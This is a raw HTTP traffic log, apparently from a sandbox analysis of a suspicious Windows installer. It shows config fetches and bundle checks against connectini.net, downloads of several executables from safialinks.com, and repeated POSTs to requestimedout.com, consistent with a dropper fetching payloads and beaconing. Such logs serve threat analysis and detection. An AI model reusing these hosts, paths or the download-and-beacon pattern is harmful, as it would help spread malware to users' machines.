Network Analysis

POST /Series/SuperNitou.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 51 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

POST /Series/Conumer4Publisher.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 53 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /Series/publisher/1/KR.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Oct 2021 09:19:05 GMT Content-Type: application/json Content-Length: 4908 Last-Modified: Thu, 18 Mar 2021 13:08:23 GMT Connection: keep-alive ETag: "605350c7-132c" X-Powered-By: PleskLin Accept-Ranges: bytes

POST /Series/Conumer2kenpachi.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: connectini.net Content-Length: 53 Expect: 100-continue Connection: Keep-Alive

HTTP/1.1 100 Continue

GET /Series/kenpachi/2/goodchannel/KR.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Oct 2021 09:19:33 GMT Content-Type: application/json Content-Length: 8320 Last-Modified: Thu, 07 Oct 2021 09:15:06 GMT Connection: keep-alive ETag: "615eba9a-2080" X-Powered-By: PleskLin Accept-Ranges: bytes

GET /Series/configPoduct/2/goodchannel.json HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Oct 2021 09:19:33 GMT Content-Type: application/json Content-Length: 344 Last-Modified: Thu, 18 Mar 2021 13:04:50 GMT Connection: keep-alive ETag: "60534ff2-158" X-Powered-By: PleskLin Accept-Ranges: bytes

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_slava_inlogsoftware HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Oct 2021 09:19:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_installrox2_BumperWw HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Oct 2021 09:19:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_piyyyyWW HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Oct 2021 09:19:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_adxpertmedia_advancedmanager HTTP/1.1 Host: connectini.net

HTTP/1.1 200 OK Server: nginx Date: Thu, 07 Oct 2021 09:19:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.1.33 X-Powered-By: PleskLin

HEAD /Installer_Provider/ShareFolder.exe HTTP/1.1 Accept: */* User-Agent: InnoDownloadPlugin/1.5 Host: safialinks.com Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 09:18:10 GMT Server: Apache Last-Modified: Mon, 04 Oct 2021 16:02:32 GMT ETag: "9d600-5cd890a629600" Accept-Ranges: bytes Content-Length: 644608 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program

GET /Installer_Provider/ShareFolder.exe HTTP/1.1 Accept: */* User-Agent: InnoDownloadPlugin/1.5 Host: safialinks.com Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 09:18:10 GMT Server: Apache Last-Modified: Mon, 04 Oct 2021 16:02:32 GMT ETag: "9d600-5cd890a629600" Accept-Ranges: bytes Content-Length: 644608 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/x-msdos-program

GET /Widgets/FolderShare.exe HTTP/1.1 Host: safialinks.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 09:18:23 GMT Server: Apache Last-Modified: Mon, 27 Sep 2021 11:36:59 GMT ETag: "bc800-5ccf883d15179" Accept-Ranges: bytes Content-Length: 772096 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program

GET /xJRtjaHLw25uhP75sj4j5SDQa3dAyG/BestCPM/Soft_Manager_Cpm.exe HTTP/1.1 Host: safialinks.com

HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 09:18:28 GMT Server: Apache Last-Modified: Mon, 04 Oct 2021 14:37:06 GMT ETag: "53400-5cd87d8da0880" Accept-Ranges: bytes Content-Length: 340992 Content-Type: application/x-msdos-program

GET /xJRtjaHLw25uhP75sj4j5SDQa3dAyG/NetworkStreamer/UpdateStream_Provider.exe HTTP/1.1 Host: safialinks.com

HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 09:18:37 GMT Server: Apache Last-Modified: Mon, 04 Oct 2021 13:30:32 GMT ETag: "b1800-5cd86eaca6e00" Accept-Ranges: bytes Content-Length: 727040 Content-Type: application/x-msdos-program

GET /xJRtjaHLw25uhP75sj4j5SDQa3dAyG/Elmet7adi/Hand_conductor.exe HTTP/1.1 Host: safialinks.com

HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 09:18:44 GMT Server: Apache Last-Modified: Mon, 04 Oct 2021 15:17:26 GMT ETag: "70000-5cd8869184d80" Accept-Ranges: bytes Content-Length: 458752 Content-Type: application/x-msdos-program

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 180 Expect: 100-continue Accept-Encoding: gzip Connection: Keep-Alive

HTTP/1.1 100 Continue

GET / HTTP/1.1 Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 09:18:50 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=ISO-8859-1 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2021-10-07-09; expires=Sat, 06-Nov-2021 09:18:50 GMT; path=/; domain=.google.com; Secure Set-Cookie: NID=511=pVIDpYVG969F7_0FOYdJtvBU1trwA6Cn7zYw7EKlDKf2pGaynSsnyKWSJrcStE4g7JRsaTu74C52YYwDuU5oK8uAnjqvfPSEc9HzEVp7intlabBI_wmZxlLITuoTD3xsxZgtu9b0XYXp8eAZJkXpO6XNTrZc1-a-DDNXomLMoIE; expires=Fri, 08-Apr-2022 09:18:50 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK x-amz-id-2: 6+mbtkau8c+zVE/WPUAP74MnQWySAnGb0cB9eKSkg9U9gOy5XiaYF/SMSr5TCZT2PR9OpyMTSik= x-amz-request-id: 6R6Q946R0EBN1W68 Date: Thu, 07 Oct 2021 09:19:18 GMT Cache-Control: public, max-age=31536000 Expires: Mon, 30 Sep 2024 11:59:59 GMT Last-Modified: Tue, 05 Oct 2021 13:35:16 GMT ETag: "d4ae187b4574036c2d76b6df8a8c1a30" Content-Type: application/pkcs7-mime Server: AmazonS3 Content-Length: 893

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK x-amz-id-2: hWhpDqQiFtdeN9HOrZ609dZZ0Nc93ur8j371ogYjTHpONu2m2X2RtNqPW0J43h/oWm1H0o+9pyA= x-amz-request-id: 6R6PAAZF6DGFPCEK Date: Thu, 07 Oct 2021 09:19:18 GMT Cache-Control: public, max-age=31536000 Expires: Mon, 30 Sep 2024 11:59:59 GMT Last-Modified: Tue, 05 Oct 2021 13:35:16 GMT ETag: "d4ae187b4574036c2d76b6df8a8c1a30" Content-Type: application/pkcs7-mime Server: AmazonS3 Content-Length: 893

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK x-amz-id-2: zb9HzC+ijAxb4yp6N0bEr/wrCifElwij5ayvVja+oDxsInC0MiaxqdCoSTdbgX2ViAbklUQPxRA= x-amz-request-id: Y7S9JW1407DTHFE2 Date: Thu, 07 Oct 2021 09:19:19 GMT Cache-Control: public, max-age=31536000 Expires: Mon, 30 Sep 2024 11:59:59 GMT Last-Modified: Tue, 05 Oct 2021 13:35:16 GMT ETag: "d4ae187b4574036c2d76b6df8a8c1a30" Content-Type: application/pkcs7-mime Server: AmazonS3 Content-Length: 893

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 180 Expect: 100-continue Accept-Encoding: gzip Connection: Keep-Alive

HTTP/1.1 100 Continue